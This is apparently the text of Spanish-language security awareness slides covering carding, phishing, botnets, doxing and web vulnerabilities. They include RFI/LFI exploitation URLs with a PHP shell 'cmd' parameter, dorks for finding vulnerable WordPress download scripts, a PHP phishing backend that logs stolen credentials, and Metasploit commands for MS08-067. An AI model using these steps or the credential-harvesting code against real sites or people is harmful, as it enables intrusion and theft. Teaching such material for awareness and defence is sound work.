Más responsabilidad y seguridad en tus datos

16-Feb-13WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 1

Mas responsabilidad y mas seguridad en tus datos |

| Seguridad INFORMATICA

WWW.WEBSEC.ESWWW.CIBERENCUENTROS.ES

http://www.websec.es/

http://www.ciberencuentros.es/

PRESENTACION:


• Me llamo Jorge

• Me dedico a la seguridad informatica.

• Mi web personal es [WEBSEC.ES]

• Mi correo es [email protected]

• Quantika14

mailto:[email protected]

MÁS RESPONSABILIDAD Y SEGURIDAD EN TUS

DATOS


• Para ser mas seguros tenemos que ser conscientes del medio que nos rodea.

• Para tener seguridad tenemos que saber nuestros sitios más débiles.

• Para ser mas responsable tenemos que saber el valor de nuestros datos y que daño

pueden causar en terceras manos.

• Para ser un usuario responsable y seguro con sus datos tiene que saber como se

realizan ataques y hasta donde se puede llegar.

• Un usuario que sepa entrar en un windows xp no lo pondrá en su negocio o en su casa.

No le pondrá a su hijo un equipo vulnerable. No tendrá contraseñas débiles. Actualizara y

será responsable y prudente con sus datos y en sus sistemas.

• Y el saber no ocupa lugar y saber esto es cada día más importante.

¿QUÉ VAMOS A DAR?


1. Definiciones

2. Fraude Online

CARDING

Phishing

Pharming

3. ¿Qué son las Botnets?

4. ¿Qué es el Doxing?

5. Prueba AutoPwn + Nmap

DEFINICIONES


• IP: Etiqueta numérica que identifica a un sistema en la red de manera unívoca.

• DNS: Domain Name Service. Servicio de resolución de dominios. Traduce dominios a direcciones IP.

• Virus: Software generalmente malicioso con capacidad de replicación y/o infección de

ficheros.

• Base de Datos(DB): conjunto de datos, clasificados por tablas,

columnas y registros. Aplicaciones PostgresSQL, MYSQL

• Host: Maquina conectada en un red y utiliza o da servicios.

• Puerto: es el valor que se usa, en el modelo de la capa de transporte, para distinguir entre las múltiples aplicaciones que se pueden conectar al mismo host. Ejemplo 80 HTTP.

FRAUDE ONLINE – ME LO

LLEVO- YO NO SOY TONTO

CARDING &

PHISHING


¿QUÉ ES EL PHREAKING?


Constante estudio de las redes telefónicas y sus ramas, para la personificación, modificación, creación de sistemas, accesos no autorizados etc.

Podemos separar el phreaking en 2 ramas principales:

- Redes telefónicas. (Phreak clásico)- Aparatos telefónicos. (Phreak contemporáneo)

Redes telefónicas :Se trabaja con las redes y distintas compañías, buscando y encontrando bugs y como explotarlos. (Como la conocida Caja Azul o lo que nos enseño nuestro querido Capitán Crunch)

Aparatos telefónicos:Se trabaja con todo aparato telefónico, no solo móviles, sino teléfonos fijos, micrófonos y todo su cableado. El fin de un Phreak es el mismo que un ingeniero de redes telefónicas, conocer todo el funcionamiento de los sistemas para encontrar errores y vulnerabilidades.

John Draper o Capitán Crunch

• Leyenda Hacker

• Años 70, el tenia 27 años.

• La empresa Quaker Oaks comercializa

cereales ―Cap’n Crunch‖.

• En ella había un regalo, un silbato azul.

• Si tapaba con pegamento un agujero

emitía 2600 Hz.

• Construyo la ―caja azul‖, un dispositivo

capaz de reproducir el resto de tonos.

• El primer prototipo de APPLE fue

financiado con el dinero que

conseguían vendiendo las cajas azul,

Steve Jobs, Steve Wozniak y John.


HISTORIA SECRETA DE LOS HACKERS

INFORMÁTICOS


http://www.youtube.com/watch?v=oloOmqOCXN4

CARDING


• ¿Qué es?: Es el uso ilegitimo de las tarjetas de crédito de otras personas.

• Estructura de las tarjetas de crédito:

1. Son 16 dígitos divididos en 4 grupos de 4 dígitos. Del 0 al 9.

2. Los 4 primeros determinan el banco.

3. ->American Express (15 dígitos)

->VISA (13 o 16 dígitos)

->Mastercard (16 dígitos)

->Discover (16 dígitos)

¿SOMOS MALOS?


• ¿Qué necesitamos?

1. Una Shell PHP en un servidor.

2. Una Fake.

3. Una lista de correos.

4. Un correo robado.

¿QUIERO MI SERVIDOR? =)


• Proceso de Footprinting.

• Análisis de vulnerabilidades.

• Explotación de vulnerabilidades.

• Generación de informe… no!!!, tenemos que pensar como un maligno.

• Subir Shell.

FOOTPRINTING


• GOOGLE HACKING (―inurl:‖, ―filetype:sql‖…)

• Herramientas que automaticen ―Anubis‖.

• Leer el código fuente!!!

• Errores 404

• IP reverse.

• Cuwhois, robtex.

• Metadatos.

• GoLismero - enlaces.

• Aplicación en python

• Muestra todos los enlaces de una

web.

• Puede guardar los resultados.

• Detectar vulnerabilidades.

GOLISMERO


VULNERABILIDADES


• Inyección SQL.

• XSS - Cross Site Scripting(persistente o reflejada).

• Persistente: inyecta código (script, iframe) maligno.

• Reflejada: modifica valores de la web que utiliza para variables. Robo de Cookies.

• RFI (inclusión remota de archivos)

• LFI (Local file inclusion)

• FPD (Full Puth Disclosure Vulnerability)

INYECCIÓN SQL


• En el nivel de validación de las entradas para realizar consultar a una base de datos no

verifica o filtra bien. Y podemos inyectar código malicioso.

• Podemos escalar privilegios.

• Podemos sacar las tablas, columnas y registros de la base de datos.

TOOLS INYECCIÓN SQL


RFI - INCLUSIÓN REMOTA DE ARCHIVOS


• Es posible debido aun error en la programación PHP, que hace que la web cargue un

determinado archivo que está contenido en una variable.

• <? include($_GET[’variable’]); ?>

• Dorks:

• inurl:/index.php?include=

• inurl:/index.php?pagina=

• Explotanción:

• http://<server>/typetest/index.php?link=http://<server>/<shellphp>

LFI – LOCAL FILE INCLUSIÓN


• Ejecutar código externo en la web victima.

• Subiendo un archivo malicioso a la misma.

• Nosotros usaremos una PHP SHELL.

• Digamos que LFI es que recibe un valor de entrada que recoge la variable cmd y es

ejecutado en el sistema mediante la llamada system de PHP.

• Podemos arreglarlo deshabilitando la llamada al sistema system en PHP

• Ejmplo:

• http://www.owned.com/imag/shell.php?cmd=ls

XSS - CROSS SITE SCRIPTING


• Usualmente no se validan correctamente los datos de entrada que son usados en

algunas aplicaciones permitiendo enviar un script malicioso a la aplicación.

• Para funcionar necesitan un punto de entrada, que suelen ser los formularios.

• A través de un ataque XSS, se puede secuestrar cuentas, cambiar

configuraciones de los usuarios, acceder a partes restringidas del sitio, modificar

el contenido del sitio, etc.

<html>

<body>

<h1>Ejemplo 1</h1>

<form action='ejemplo1-2.php' method='post'>

<center><h1><b>Elige tu sistema favorito</b></h1></center><br>

<input type="radio" name="os" value="Linux">Linux<br>

<input type="radio" name="os" value="Windows">Windows<br>

<input type="radio" name="os"value="MacOS">MacOs<br>

<center><input type="submit"value="enviar"></center>

</form>

</body>

</html>

• <?

• $Choice = $_REQUEST[os];

• ?>

• <html>

• <head><TITLE>Ejemplo XSS</TITLE></head>

• <body>

• <br>

• <center>

• <h1>Elegiste: <? echo $Choice?></h1>

• </center>

• </body>

• </html>

XSS - CROSS SITE SCRIPTING

EJEMPLO 1.


• Solución:

• $Choice = htmlentities($_REQUEST[OS]);

• <?

• $Choice = htmlentities($_REQUEST[OS]);

• ?>

• <html>

• <head><TITLE>Ejemplo XSS</TITLE></head>

• <body>

• <br>

• <center>

• <h1>Elegiste: <? echo $Choice?></h1>

• </center>

• </body>

• </html>

Solución

htmlentities —

Convierte todos

los caracteres

aplicables a

entidades HTML


• Permite la descarga de archivos php

de la plataforma poniéndola en

peligro. Imaginaros descargar el "wp-

config" del cms donde se encuentra

toda la configuración a la base de

datos de nuestra web.

• DORKS:

• inurl:download.php?download_file= &

inurl:wp-content

• inurl:download.php?&path= & inurl:wp-

content

codigo de download.php:

• <? $download_file = $_GET['download_file'];

• $split_file = xplode('/',$download_file);

• $split_file_num = count($split_file);

• $my_section = $split_file_num-1;

• $download_file_name = $split_file[$my_section]; header ("Content-type: octet/stream");

• header ("Content-disposition:

• attachment;

• filename=".$download_file_name.";")

• ; header('Content-type: application/pdf');

• header("Content-Length:

• ".filesize($download_file)); readfile($download_file); exit; ?>

WORDPRESS VULN


¿QUÉ ES UNA BOTNET?


UNA BOTNET:


• Es una colección de software robots.

• Son maquinas infectadas que realizan acciones en conjunto de una manera centralizada.

• El artífice de la botnet puede controlar todos las maquinas infectadas de una forma

remota.

• IRC, HTTP. Incluso por SMS…

MEDIDAS PREVENTIVAS


• Usa un firewall.

• Usa un antivirus.

• Instala programas que sólo provengan de fuentes fiables.

• Evita abrir ejecutables de correos.

• Actualiza tu sistema y programas.

• Cuidado con los fakes o scams.

• Cuidado con dispositivos de almacenamiento externos.

• No activar el auto ejecutar de las descargas de los navegadores.

• Ser prudente y precavido.

ESTAMOS EN UNA BOTNET???


• Usa el comando ―netstat‖: netstat –naconexiones entrantes

• Si el internet te va lento. Examina el trafico.

• Pasa un antivirus.

• Formatea.

¿QUÉ ES UN FAKE?


• Es una web clon de una pagina oficial con la intención

de robar los datos de un login (usuario, password, pin,

credenciales, etc)

• Es una técnica de phishing. Suelen engañarnos

atreves de correos o desde las redes sociales,

utilizando la ingeniería social.

EJEMPLO DE FAKE 1


EJEMPLO DE FAKE 2


DETRÁS EN PHP


• <?php

• $login=$_POST["nombre"];

• $pass=$_POST["password"];

• $guardar = fopen("pass.txt",a); // funcion fopen abre el archivo pass.txt

• /* La funcion fopen tiene diferentes modos a= abre el archivo solo cuando se escribe, a+=abre el archivo cuando se lee y se escribe*/

• fwrite($guardar,"

• usuario: ".$login."

• password: ".$pass);

• fclose($guardar); //cierra fopen

• echo "<META HTTP-EQUIV='refresh' CONTENT='1; url=http://websec.es'>";

• ?>


• Es el proceso de obtención de información acerca de una persona a través de fuentes de internet.

• Deriva de ―Document‖ y ―ing‖; documentando.

• El sujeto o entidad de la búsqueda y revelación de datos e información es ―TARGET‖

• El doxer para encontrar toda la información posible es incluso de entrar en base de datos gubernamentales o viajar a la ciudad del objetivo.

¿QUÉ ES EL DOXING?


METASPLOIT INTRUSIÓN WINDOWS XP SP3

NETAPI


• use windows/smb/ms08_067_netapi

• Show options

• Set RHOST ―ipvictima‖

• set payload windows/vncinject/bind_tcp

• Set lport 4444

• EXPLOIT

Technology

Más responsabilidad y seguridad en tus datos